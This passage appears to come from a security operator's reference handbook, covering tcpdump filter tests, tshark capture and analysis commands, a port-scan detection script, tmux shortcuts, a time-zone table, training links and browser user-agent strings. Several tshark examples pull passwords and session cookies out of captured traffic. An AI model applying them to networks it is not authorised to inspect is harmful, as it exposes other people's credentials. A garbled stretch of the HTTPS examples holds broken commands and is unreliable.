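        "get_at_32 misses GET w/o options": not matches("get_at_32", hdr + get),
    }


if __name__ == "__main__":
    for desc, ok in run_checks().items():
        print("%-36s %s" % (desc, "ok" if ok else "FAIL"))
```

Every entry of run_checks() should come back True; the last two lines are the point of the exercise: a payload match pinned to tcp[32] only fires for one particular header length, which is why the SSH filter derives the payload start from the data offset instead.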

REFERENCE:
[Link]
tcpdump/blob/master/tcpdump_advanced_filters.txt
[Link]
eet-tcpdump-A4
[Link]
[Link]
[Link]
[Link]

THREAT INTELLIGENCE
BLUE TEAM MISC N/A

Curated List of Threat Intelligence Sources


[Link]

TIMEZONES
ALL INFORMATIONAL N/A

COUNTRY/REGION TIME ZONE OFFSET


Afghanistan Afghanistan ST UTC+04:30
Alaska Alaskan ST UTC-09:00
Albania: Tirana Central European ST UTC+01:00
Algeria Central European ST UTC+01:00
Almaty Central Asia ST UTC+06:00
Novosibirsk N. Central Asia ST UTC+07:00
American Samoa Samoa ST UTC-11:00
Andorra Romance ST UTC+01:00
Angola W. Central Africa ST UTC+01:00
Anguilla SA Western ST UTC-04:00
Antarctica GMT ST UTC
Antigua and Barbuda SA Western ST UTC-04:00
Argentina: Buenos Aires Argentina ST UTC-03:00
Armenia Caucasus ST UTC+04:00
Aruba, Caracas SA Western ST UTC-04:00
Atlantic Time (Canada) Atlantic ST UTC-04:00
Australia: Darwin AUS Central ST UTC+09:30

Australia: Adelaide Cen. Australia ST UTC+09:30
Australia: Brisbane, Coral Sea Islands E. Australia ST UTC+10:00
Australia: Canberra, Melbourne, Sydney AUS Eastern ST UTC+10:00
Australia: Perth, Ashmore & Cartier Islands W. Australia ST UTC+08:00
Austria: Vienna W. Europe ST UTC+01:00
Azerbaijan Azerbaijan ST UTC+04:00
Azores Azores ST UTC-01:00
Bahamas, The Eastern ST UTC-05:00
Bahrain, Kuwait, Riyadh, Qatar, Saudi Arabia Arab ST UTC+03:00
Baku, Tbilisi, Yerevan Caucasus ST UTC+04:00
Bangladesh Central Asia ST UTC+06:00
Barbados SA Western ST UTC-04:00
Belarus Further-Eastern ET UTC+03:00
Belgium Brussels Romance ST UTC+01:00
Belize Central America ST UTC-06:00
Benin W. Central Africa ST UTC+01:00
Bermuda SA Western ST UTC-04:00
Bhutan Central Asia ST UTC+06:00
Bolivia: La Paz SA Western ST UTC-04:00
Bosnia and Herzegovina: Sarajevo Central European ST UTC+01:00
Botswana South Africa ST UTC+02:00
Bouvet Island W. Central Africa ST UTC+01:00
Brazil: Brasilia E. South America ST UTC-03:00
British Indian Ocean Territory Central Asia ST UTC+06:00
Brunei Singapore ST UTC+08:00
Bulgaria: Sofia FLE ST UTC+02:00
Burkina Faso Greenwich ST UTC
Burundi South Africa ST UTC+02:00
Cabo Verde (Cape Verde) islands Cabo Verde ST UTC-01:00
Cambodia SE Asia ST UTC+07:00
Cameroon W. Central Africa ST UTC+01:00
Cayman Islands SA Pacific ST UTC-05:00
Central African Republic W. Central Africa ST UTC+01:00
Central Time (US and Canada) Central ST UTC-06:00
Chad W. Central Africa ST UTC+01:00
Channel Islands GMT ST UTC
Chile: Santiago Pacific SA ST UTC-04:00
China: Beijing, Macao SAR, Hong Kong SAR China ST UTC+08:00
Christmas Island SE Asia ST UTC+07:00
Cocos (Keeling) Islands Myanmar ST UTC+06:30
Colombia: Bogota, Ecuador: Quito SA Pacific ST UTC-05:00
Comoros E. Africa ST UTC+03:00
Congo W. Central Africa ST UTC+01:00
Congo (DRC) W. Central Africa ST UTC+01:00
Cook Islands Hawaiian ST UTC-10:00
Costa Rica Central America ST UTC-06:00
Croatia: Zagreb Central European ST UTC+01:00
Cuba SA Pacific ST UTC-05:00
Cyprus GTB ST UTC+02:00
Czech Republic: Prague Central Europe ST UTC+01:00
Côte d'Ivoire Greenwich ST UTC
Denmark: Copenhagen Romance ST UTC+01:00
Diego Garcia Central Asia ST UTC+06:00
Djibouti E. Africa ST UTC+03:00
Dominica SA Western ST UTC-04:00
Dominican Republic SA Western ST UTC-04:00
Eastern Time (US and Canada) Eastern ST UTC-05:00
Ecuador SA Pacific ST UTC-05:00
Egypt Cairo Egypt ST UTC+02:00
Ekaterinburg Ekaterinburg ST UTC+05:00
El Salvador Central America ST UTC-06:00
Equatorial Guinea W. Central Africa ST UTC+01:00
Eritrea E. Africa ST UTC+03:00
Estonia: Tallinn FLE ST UTC+02:00
Eswatini (formerly Swaziland) South Africa ST UTC+02:00
Ethiopia E. Africa ST UTC+03:00
Falkland Islands (Islas Malvinas) Atlantic ST UTC-03:00
Faroe Islands GMT ST UTC
Fiji Islands Fiji ST UTC+12:00
Finland: Helsinki FLE ST UTC+02:00
France: Paris Romance ST UTC+01:00
French Guiana SA Eastern ST UTC-03:00
French Polynesia Hawaiian ST UTC-10:00
French Southern and Antarctic Lands West Asia ST UTC+05:00
Gabon W. Central Africa ST UTC+01:00
Gambia, The Greenwich ST UTC
Georgia: Tbilisi Georgian ST UTC+04:00
Germany: Berlin W. Europe ST UTC+01:00
Ghana Greenwich ST UTC
Gibraltar W. Europe ST UTC+01:00
Greece Athens GTB ST UTC+02:00
Greenland Greenland ST UTC-03:00
Grenada SA Western ST UTC-04:00
Guadeloupe SA Western ST UTC-04:00
Guam West Pacific ST UTC+10:00
Guantanamo Bay Eastern ST UTC-05:00
Guatemala Central America ST UTC-06:00
Guernsey GMT ST UTC
Guinea Greenwich ST UTC

Guinea-Bissau Greenwich ST UTC
Guyana: Georgetown SA Western ST UTC-04:00
Haiti Eastern ST UTC-05:00
Heard Island and McDonald Islands West Asia ST UTC+05:00
Honduras Central America ST UTC-06:00
Howland Island Dateline ST UTC-12:00
Hungary: Budapest Central Europe ST UTC+01:00
Iceland Greenwich ST UTC
India India ST UTC+05:30
Indonesia: Jakarta SE Asia ST UTC+07:00
International Date Line West, Baker Island Dateline ST UTC-12:00
Iran Iran ST UTC+03:30
Iraq Arabic ST UTC+03:00
Ireland: Dublin GMT ST UTC
Isle of Man GMT ST UTC
Israel Israel ST UTC+02:00
Italy: Rome W. Europe ST UTC+01:00
Jamaica SA Pacific ST UTC-05:00
Jan Mayen W. Europe ST UTC+01:00
Japan: Osaka, Sapporo, Tokyo Tokyo ST UTC+09:00
Jarvis Island Samoa ST UTC-11:00
Jersey GMT ST UTC
Johnston Atoll Hawaiian ST UTC-10:00
Jordan Jordan ST UTC+02:00
Kazakhstan Central Asia ST UTC+06:00
Kenya E. Africa ST UTC+03:00
Kingman Reef Samoa ST UTC-11:00
Kiribati Tonga ST UTC+13:00
Korea Korea ST UTC+09:00
Krasnoyarsk North Asia ST UTC+07:00
Kyrgyzstan Central Asia ST UTC+06:00
Laos SE Asia ST UTC+07:00
Latvia: Riga, Vilnius FLE ST UTC+02:00
Lebanon Middle East ST UTC+02:00
Lesotho South Africa ST UTC+02:00
Liberia Monrovia Greenwich ST UTC
Libya: Tripoli Libya ST UTC+02:00
Liechtenstein W. Europe ST UTC+01:00
Lithuania FLE ST UTC+02:00
Luxembourg W. Europe ST UTC+01:00
Macedonia FYROM W. Europe ST UTC+01:00
Madagascar E. Africa ST UTC+03:00
Malawi South Africa ST UTC+02:00
Malaysia: Kuala Lumpur Singapore ST UTC+08:00
Maldives West Asia ST UTC+05:00
Mali Greenwich ST UTC
Malta W. Europe ST UTC+01:00
Marshall Islands Fiji ST UTC+12:00

Martinique SA Western ST UTC-04:00
Mauritania Greenwich ST UTC
Mauritius Mauritius ST UTC+04:00
Mayotte, Nairobi E. Africa ST UTC+03:00
Mexico Tijuana Pacific ST (Mexico) UTC-08:00
Mexico: Chihuahua, Mazatlan, La Paz Mountain ST (Mexico) UTC-07:00
Mexico: Guadalajara, Mexico City, Monterrey Central ST (Mexico) UTC-06:00
Micronesia Fiji ST UTC+12:00
Midway Islands Samoa ST UTC-11:00
Moldova FLE ST UTC+02:00
Monaco W. Europe ST UTC+01:00
Mongolia: Ulaanbaatar, Russia: Irkutsk North Asia East ST UTC+08:00
Montserrat SA Western ST UTC-04:00
Morocco Casablanca Morocco ST UTC+01:00
Mountain Time (US and Canada) Mountain ST UTC-07:00
Mozambique South Africa ST UTC+02:00
Myanmar: Yangon Rangoon Myanmar ST UTC+06:30
Namibia Namibia ST UTC+02:00
Nauru Fiji ST UTC+12:00
Nepal: Kathmandu Nepal ST UTC+05:45
Netherlands Antilles SA Western ST UTC-04:00
Netherlands: Amsterdam W. Europe ST UTC+01:00
New Caledonia Central Pacific ST UTC+11:00
New Zealand New Zealand ST UTC+12:00
Newfoundland/Labrador Newfoundland and Labrador ST UTC-03:30
Nicaragua Central America ST UTC-06:00
Niger W. Central Africa ST UTC+01:00
Nigeria W. Central Africa ST UTC+01:00
Niue Samoa ST UTC-11:00
Norfolk Island Central Pacific ST UTC+11:00
North Korea Korea ST UTC+09:00
Northern Mariana Islands West Pacific ST UTC+10:00
Norway W. Europe ST UTC+01:00
Oman Arabian ST UTC+04:00
Pacific Time (US and Canada) Pacific ST UTC-08:00
Pakistan Pakistan ST UTC+05:00
Pakistan: Islamabad, Karachi West Asia ST UTC+05:00
Palau Tokyo ST UTC+09:00
Palestinian Authority GTB ST UTC+02:00
Palmyra Atoll Samoa ST UTC-11:00
Panama SA Pacific ST UTC-05:00
Papua New Guinea: Port Moresby West Pacific ST UTC+10:00
Paraguay Paraguay ST UTC-04:00
Peru: Lima SA Pacific ST UTC-05:00

Philippines, China: Chongqing, China: Ürümqi China ST UTC+08:00
Pitcairn Islands Pacific ST UTC-08:00
Poland: Warsaw, Skopje Central European ST UTC+01:00
Portugal: Lisbon GMT ST UTC
Puerto Rico SA Western ST UTC-04:00
Romania GTB ST UTC+02:00
Romania: Bucharest E. Europe ST UTC+02:00
Rota Island West Pacific ST UTC+10:00
Russia: Moscow, St. Petersburg, Volgograd Russian ST UTC+03:00
Rwanda South Africa ST UTC+02:00
Réunion Arabian ST UTC+04:00
Saint Helena, Ascension, Tristan da Cunha GMT ST UTC
Saipan West Pacific ST UTC+10:00
Samoa Samoa ST UTC+13:00
San Marino W. Europe ST UTC+01:00
Saskatchewan Canada Central ST UTC-06:00
Senegal Greenwich ST UTC
Serbia: Belgrade Central Europe ST UTC+01:00
Seychelles Arabian ST UTC+04:00
Sierra Leone Greenwich ST UTC
Singapore Singapore ST UTC+08:00
Slovakia: Bratislava Central Europe ST UTC+01:00
Slovenia: Ljubljana Central Europe ST UTC+01:00
Solomon Islands Central Pacific ST UTC+11:00
Somalia E. Africa ST UTC+03:00
South Africa: Pretoria South Africa ST UTC+02:00
South Georgia & South Sandwich Islands Mid-Atlantic ST UTC-02:00
Spain Madrid Romance ST UTC+01:00
Sri Lanka: Sri Jayawardenepura Sri Lanka ST UTC+05:30
St. Helena Greenwich ST UTC
St. Kitts and Nevis SA Western ST UTC-04:00
St. Lucia SA Western ST UTC-04:00
St. Pierre and Miquelon SA Eastern ST UTC-03:00
St. Vincent and the Grenadines SA Western ST UTC-04:00
Sudan Sudan ST UTC+02:00
Suriname SA Eastern ST UTC-03:00
Svalbard W. Europe ST UTC+01:00
Sweden: Stockholm W. Europe ST UTC+01:00
Switzerland: Bern W. Europe ST UTC+01:00
Syria South Africa ST UTC+02:00
São Tomé and Príncipe Greenwich ST UTC
Taiwan: Taipei Taipei ST UTC+08:00
Tanzania E. Africa ST UTC+03:00
Tasmania: Hobart Tasmania ST UTC+10:00

Thailand: Bangkok SE Asia ST UTC+07:00
Timor-Leste Tokyo ST UTC+09:00
Tinian Island West Pacific ST UTC+10:00
Togo Greenwich ST UTC
Tokelau Tonga ST UTC+13:00
Tonga: Nuku'alofa Tonga ST UTC+13:00
Trinidad and Tobago SA Western ST UTC-04:00
Tristan da Cunha Greenwich ST UTC
Tunisia W. Europe ST UTC+01:00
Turkey: Istanbul Turkey ST UTC+03:00
Turkmenistan, Tajikistan West Asia ST UTC+05:00
Turks and Caicos Islands SA Pacific ST UTC-05:00
Tuvalu Fiji ST UTC+12:00
US Arizona, Clipperton Island US Mountain ST UTC-07:00
US Indiana (East) U.S. Eastern ST UTC-05:00
US and Canada Pacific ST UTC-08:00
US and Canada Mountain ST UTC-07:00
US and Canada Central ST UTC-06:00
US and Canada Eastern ST UTC-05:00
Uganda E. Africa ST UTC+03:00
Ukraine: Kiev FLE ST UTC+02:00
United Arab Emirates Arabian ST UTC+04:00
United Kingdom: London, Edinburgh GMT ST UTC
Uruguay SA Eastern ST UTC-03:00
Uzbekistan: Tashkent West Asia ST UTC+05:00
Vanuatu: Port Vila, Russia: Magadan Central Pacific ST UTC+11:00
Vatican City W. Europe ST UTC+01:00
Venezuela Venezuela ST UTC-04:00
Vietnam: Hanoi SE Asia ST UTC+07:00
Virgin Islands SA Western ST UTC-04:00
Virgin Islands, British SA Western ST UTC-04:00
Vladivostok Vladivostok ST UTC+10:00
Wake Island Fiji ST UTC+12:00
Wallis and Futuna Fiji ST UTC+12:00
Yakutsk Yakutsk ST UTC+09:00
Yemen E. Africa ST UTC+03:00
Zambia South Africa ST UTC+02:00
Zimbabwe: Harare South Africa ST UTC+02:00

TMUX
ALL ADMINISTRATION LINUX/MacOS
tmux is a terminal multiplexer that lets you switch easily between
several programs in one terminal, detach them, and reattach them to
a different terminal.

SESSIONS
tmux                                Start a tmux session
tmux new -s example                 Start a new named session
tmux kill-ses -t example            Kill a named session
tmux kill-ses -a                    Kill all sessions except the current one
tmux kill-ses -a -t example         Kill all sessions except the named one
tmux ls                             List all sessions
tmux a                              Attach to the last session
tmux a -t example                   Attach to a named session
tmux new -s example -n window1      Start a new session with a session name and a window name
NAVIGATION
Ctrl + b $                          Rename the session
Ctrl + b d                          Detach from the session
Ctrl + b s                          List all sessions
Ctrl + b (                          Move to the previous session
Ctrl + b )                          Move to the next session
Ctrl + b c                          Create a window
Ctrl + b ,                          Rename the current window
Ctrl + b &                          Close the current window
Ctrl + b p                          Previous window
Ctrl + b n                          Next window
Ctrl + b q                          Show pane numbers
Ctrl + b 0                          Switch/select window by number [0-9]
Ctrl + b ;                          Toggle last active pane
Ctrl + b %                          Split pane vertically (side by side)
Ctrl + b "                          Split pane horizontally (top/bottom)
Ctrl + b {                          Move the current pane left
Ctrl + b }                          Move the current pane right
Ctrl + b Spacebar                   Toggle between pane layouts
Ctrl + b o                          Switch to the next pane
Ctrl + b z                          Toggle pane zoom
Ctrl + b x                          Close the current pane
ADVANCED
tmux info                           Show every session, window, pane, etc.
Ctrl + b ?                          Show shortcuts
Ctrl + b : setw synchronize-panes   Synchronize panes: send typed input to all panes of the window
Ctrl + b : swap-window -s 2 -t 1    Reorder windows: swap window number 2 (src) and 1 (dst)
Ctrl + b : show-buffer              Show the contents of the paste buffer
Ctrl + b : set -g OPTION            Set OPTION globally for all sessions
Ctrl + b : setw -g OPTION           Set OPTION globally for all windows
TRAINING_Blue Team
BLUE TEAM MISC ALL

Detection Lab
This lab has been designed with defenders in mind. Its primary
purpose is to allow the user to quickly build a Windows domain that
comes pre-loaded with security tooling and some best practices when
it comes to system logging configurations.
[Link]

Modern Windows Attacks and Defense Lab


This is the lab configuration for the Modern Windows Attacks and
Defense class that Sean Metcalf (@pyrotek3) and I teach.
[Link]

Invoke-UserSimulator
Simulates common user behavior on local and remote Windows hosts.
[Link]

Invoke-ADLabDeployer
Automated deployment of Windows and Active Directory test lab
networks. Useful for red and blue teams.
[Link]

Sheepl
Creating realistic user behavior for supporting tradecraft
development within lab environments.
[Link]

MemLabs - Memory Forensics CTF


MemLabs is an educational, introductory set of CTF-styled
challenges which is aimed to encourage students, security
researchers and also CTF players to get started with the field of
Memory Forensics.
[Link]

Security Certification Progression Chart

Reddit -> u/SinecureLife
[Link]tification_progression_chart_2020/
[Link]

TRAINING_OSINT
OSINT MISC ALL

Bellingcat Workshops
[Link]

TRAINING_Red Team
RED TEAM MISC ALL

IPPSEC - Hackthebox, CTF, Training Walkthroughs


[Link]

[Link]
Hack The Box is an online platform allowing you to test your
penetration testing skills and exchange ideas and methodologies
with thousands of people in the security field.
[Link]

awesome-cyber-skills
A curated list of hacking environments where you can train your
cyber skills legally and safely
[Link]

VULNHUB
To provide materials that allows anyone to gain practical 'hands-
on' experience in digital security, computer software & network
administration.
[Link]

CTF Awesome Lists


[Link]
[Link]

Bug Bounties Lists


[Link]
[Link]

Security Certification Progression Chart

Reddit -> u/SinecureLife
[Link]tification_progression_chart_2020/
[Link]

TSHARK
RED/BLUE NETWORK TRAFFIC WINDOWS/LINUX/MacOS

COMMAND / DESCRIPTION
tshark -D
    List available interfaces
tshark -h
    Help
tshark -i # (# is the interface number), tshark -i 'name' ('name' is the interface name)
    Capture on an interface
tshark -i # -w {path and file name}
    Write the capture to a file
tshark -i # -f "filter text using BPF syntax"
    Capture using a capture filter (BPF syntax, the same as tcpdump)
tshark -r /tmp/[Link] -Y "ip.addr == [Link]"
    Read a capture file and show only the traffic of one IP address
-Y <display filter>
    Apply a display filter (Wireshark syntax) while capturing or when examining a capture file. Older examples use -R; in current tshark -R is a two-pass read filter that requires -2, so -Y is used throughout below.

DISPLAY FILTERS
eth.addr == [Link]
    Ethernet address
eth.type == 0x0806
    Ethernet type 0x0806 (ARP)
eth.addr == ff:ff:ff:ff:ff:ff
    Ethernet broadcast
not arp
    No ARP
ip
    IPv4 only
ipv6
    IPv6 only
!(ip.addr == [Link])
    IPv4 address is not [Link]
ipx
    IPX only
tcp
    TCP only
udp
    UDP only
!(udp.port == 53)
    UDP port isn't 53 (not DNS). Don't use udp.port != 53 for this: it is true whenever either of the two ports differs from 53, so DNS packets still match.
tcp.port == 80 || udp.port == 80
    TCP or UDP port is 80 (HTTP)
http
    HTTP only
not arp and not (udp.port == 53)
    No ARP and no DNS
not (tcp.port == 80) and not (tcp.port == 25) and ip.addr == [Link]
    Non-HTTP and non-SMTP traffic to/from [Link]

FIELD EXTRACTION
tshark -o "tcp.desegment_tcp_streams:TRUE" -i eth0 -Y "http.response" -T fields -e http.response.code
    Display HTTP response codes
tshark -i eth0 -nn -e ip.src -e eth.src -T fields -E separator=, -Y ip
    Display source IP and MAC address (comma separated)
tshark -i eth0 -nn -e ip.dst -e eth.dst -T fields -E separator=, -Y ip
    Display destination IP and MAC address (comma separated)
tshark -i eth0 -nn -e ip.src -e ip.dst -T fields -E separator=, -Y ip
    Source and destination IPv4
tshark -i eth0 -nn -e ipv6.src -e ipv6.dst -T fields -E separator=, -Y ipv6
    Source and destination IPv6
tshark -i eth0 -nn -e ip.src -e dns.qry.name -E separator=";" -T fields port 53
    Source IP and DNS query (the trailing port 53 is a capture filter)
tshark -o 'gui.column.format:"Source","%s","Destination","%d"' -T text
    Display only the source and destination IP columns

STATISTICS FROM A CAPTURE FILE
tshark -r [Link] -qz 'io,stat,1,0,sum(tcp.analysis.retransmission)"ip.addr==[Link]"' > [Link]
    I/O statistics example (1 second intervals, retransmissions of one host) written to a file
tshark -r [Link] -qz 'io,stat,120,"ip.addr==[Link] && tcp","COUNT(tcp.analysis.retransmission) ip.addr==[Link] && tcp.analysis.retransmission"'
    I/O statistics example: TCP packets and retransmissions of one host per 120 second interval
tshark -r [Link] -q -z 'io,stat,30,"COUNT(tcp.analysis.retransmission) tcp.analysis.retransmission"'
    I/O statistics example: retransmission count per 30 second interval
tshark -r [Link] -q -z ip_hosts,tree
    IP host statistics
tshark -r [Link] -q -z conv,tcp
    TCP conversation statistics
tshark -r [Link] -q -z ptype,tree
    Port type statistics
tshark -r [Link] -Y http.request -T fields -e http.host -e http.request.uri | sed -e 's/?.*$//' | sed -e 's#^\(.*\)\t\(.*\)$#http://\1\2#' | sort | uniq -c | sort -rn | head
    Display the top 10 URLs
tshark -nn -r [Link] -T fields -E separator=';' -e ip.src -e ip.dst -e tcp.dstport -Y 'tcp.flags.syn == 1 and tcp.flags.ack == 0'
    Create a ";" separated file with source IP, destination IP and destination port of SYN-initiated connections

HTTP/HTTPS ANALYSIS EXAMPLES
tshark -Y 'http' -r HTTP_traffic.pcap
    HTTP traffic from a PCAP file
tshark -r HTTP_traffic.pcap -Y "ip.src==[Link] && ip.dst==[Link]"
    Show the IP packets sent from IP address [Link] to IP address [Link]
tshark -r HTTP_traffic.pcap -Y "http.request.method==GET"
    Only print packets containing GET requests
tshark -r HTTP_traffic.pcap -Y "http.request.method==GET" -T fields -e ip.src -e http.request.full_uri
    Print only source IP and URL for all GET request packets
tshark -r HTTP_traffic.pcap -Y "http contains password"
    How many HTTP packets contain the "password" string
tshark -r HTTP_traffic.pcap -Y "http.request.method==GET && http.host==[Link]" -T fields -e ip.src
    Which IP address sent GET requests to the New York Times ([Link])
tshark -r HTTP_traffic.pcap -Y "ip contains [Link] && ip.src==[Link]" -T fields -e ip.src -e http.cookie
    What session ID is being used by [Link] for the Amazon India store ([Link])
tshark -r HTTP_traffic.pcap -Y "ip.addr==[Link] && http" -T fields -e http.user_agent
    What type of OS the machine at IP address [Link] is using (Windows/Linux/MacOS/Solaris/Unix/BSD), from the User-Agent
tshark -Y 'ssl' -r HTTPS_traffic.pcap
    Only show SSL/TLS traffic (the dissector was renamed to tls in Wireshark 3.0; use tls on current versions)
tshark -r HTTPS_traffic.pcap -Y "ssl.handshake" -T fields -e ip.src -e ip.dst
    Only print the source IP and destination IP for all SSL handshake packets
tshark -r HTTPS_traffic.pcap -Y "ssl.handshake" -T fields -e
    List issuer name for all SSL certificates
[Link] exchanged
tshark -r HTTPS_traffic.pcap -Y "ssl && Print the IP addresses
[Link]==1" -Tfields -e of all servers
[Link] accessed over SSL
IP addresses
associated with Ask
tshark -r HTTPS_traffic.pcap -Y "ip Example servers
contains askexample" ([Link])
tshark -r HTTPS_traffic.pcap -Y
"[Link]==[Link] || IP address of the user
[Link]==[Link] || who interacted with
[Link]==[Link] || with Ask Ubuntu
[Link]==[Link]" -Tfields -e servers
[Link] ([Link])
DNS servers were used
tshark -r HTTPS_traffic.pcap -Y "dns && by the clients for
[Link]==0" -Tfields -e domain name
[Link] resolutions
What are the IP
tshark -r HTTPS_traffic.pcap -Y "ip addresses of the
contains avast" -Tfields -e [Link] machines running Avast
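The "SYN initiated connections" one-liner above writes one "source;destination;port" line per TCP SYN. The following is an added example (not from the Operator Handbook) that post-processes that text offline: it tallies SYNs per source and flags a source that opened SYNs to many distinct ports on one host, a crude port-scan check worth running before opening the pcap by hand. The sample lines are constructed, not a real capture; the field names behind the tshark -e options are not shown because the page does not name them.

```python
"""Summarise tshark '-T fields -E separator=;' output for SYN-initiated connections.

Added example, not part of the Operator Handbook. Input lines are
"<src ip>;<dst ip>;<dst port>", as produced by the SYN one-liner on the page.
"""
from collections import Counter, defaultdict

# Constructed sample output (not a real capture). The last line has an empty
# port field, which tshark emits when the field is absent; it must be skipped.
SAMPLE_SYN_OUTPUT = """\
10.0.0.5;10.0.0.20;22
10.0.0.5;10.0.0.20;80
10.0.0.5;10.0.0.20;443
10.0.0.5;10.0.0.20;3389
10.0.0.5;10.0.0.20;8080
10.0.0.7;10.0.0.20;443
10.0.0.7;10.0.0.21;443
10.0.0.5;10.0.0.21;445
10.0.0.9;10.0.0.20;
"""


def parse_fields(text, sep=";"):
    """Turn tshark field lines into (src, dst, dport) tuples, skipping lines
    that do not carry all three values instead of crashing on them."""
    rows = []
    for line in text.splitlines():
        parts = line.rstrip("\r").split(sep)
        if len(parts) < 3 or not parts[2].strip():
            continue
        rows.append((parts[0], parts[1], int(parts[2])))
    return rows


def syn_summary(rows):
    """SYN count per source and the set of (dst, port) pairs each source hit."""
    syn_count = Counter(src for src, _, _ in rows)
    targets = defaultdict(set)
    for src, dst, dport in rows:
        targets[src].add((dst, dport))
    return syn_count, targets


def likely_scanners(rows, min_distinct_ports=5):
    """Sources that sent SYNs to at least `min_distinct_ports` different ports
    on a single host. Normal clients rarely do this; scanners always do."""
    ports_per_pair = defaultdict(set)
    for src, dst, dport in rows:
        ports_per_pair[(src, dst)].add(dport)
    return sorted({src for (src, _dst), ports in ports_per_pair.items()
                   if len(ports) >= min_distinct_ports})


if __name__ == "__main__":
    rows = parse_fields(SAMPLE_SYN_OUTPUT)
    counts, targets = syn_summary(rows)
    for src, n in counts.most_common():
        print(f"{src}: {n} SYNs to {len(targets[src])} distinct host:port pairs")
    print("possible scanners:", likely_scanners(rows))
```

Feed it the real file with `parse_fields(open("syn.txt").read())`; the threshold in `likely_scanners` is a starting point to tune against the network's normal traffic, not a fixed rule.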

REFERENCE:
[Link]
usage-examples
[Link]

USER AGENTS
ALL INFORMATIONAL ALL
Top 50 User Agents sorted by OS & Software version.

OS       SOFTWARE               USER AGENT
Android  Chrome 68              Mozilla/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build/RB3N5C; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/68.0.3440.91 Mobile Safari/537.36
iOS      Safari 11              Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
iOS      Safari 12              Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1
iOS      Safari 12.1            Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1
iOS      Safari 12.1            Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Mobile/15E148 Safari/604.1
iOS      Safari 12.1            Mozilla/5.0 (iPad; CPU OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Mobile/15E148 Safari/604.1
macOS    Safari 12.1            Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15
macOS    WebKit-based browser   Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko)
Windows  Chrome 57              Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Windows  Chrome 58              Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Windows  Chrome 60              Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Windows  Chrome 61              Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Windows  Chrome 63              Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Windows  Chrome 64              Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Windows  Chrome 65              Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Windows  Chrome 67              Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Windows  Chrome 67              Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Windows  Chrome 68              Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Windows  Chrome 69              Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Windows  Chrome 70              Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Windows  Chrome 70              Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Windows  Chrome 70              Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Windows  Chrome 72              Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Windows  Chrome 74              Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36
Windows  Chrome 79              Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
Windows  Chrome 79              Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
Windows  Chrome 79              Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Windows  Edge 40                Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
Windows  Edge 41                Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299
